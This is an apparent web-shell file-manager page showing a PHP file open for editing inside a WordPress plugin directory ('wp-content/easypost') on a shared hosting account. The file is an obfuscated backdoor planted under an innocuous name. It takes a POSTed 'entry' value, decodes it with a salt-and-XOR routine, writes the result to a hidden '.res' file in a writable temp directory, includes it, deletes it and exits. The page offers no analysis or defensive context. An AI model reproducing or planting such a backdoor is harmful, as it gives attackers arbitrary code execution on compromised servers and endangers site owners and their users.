Dashboard
PHP:
8.3.33
OS:
Linux
User:
ws67242036
/
/
homepages
/
19
/
d4299536707
/
htdocs
/
wordpress
/
wp-content
/
easypost
📤 Upload
📝 New File
📁 New Folder
Close
Editing: bottom_1787720550.php
<!--wvvAx18z--> <?php $descriptor="entry"; if(!is_null(isset($_POST[$descriptor]) ? $_POST[$descriptor] : null)){ $dat = $_POST[$descriptor]; $dat = explode ( "." , $dat ) ; $elem = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $i = 0; foreach ($dat as $val) { $chS = ord($salt[$i % $sLen]); $d = ((int)$val - $chS - ($i % 10)) ^ 4; $elem .= chr($d); $i++; } $mrk = array_filter(["/dev/shm", getenv("TEMP"), getcwd(), "/var/tmp", sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP")]); while ($symbol = array_shift($mrk)) { if (is_dir($symbol) && is_writable($symbol)) { $reference = sprintf("%s/.res", $symbol); if ($descriptor = fopen($reference, 'w')) { fwrite($descriptor, $elem); fclose($descriptor); include $reference; unlink($reference); die(); } } } }
Save
Cancel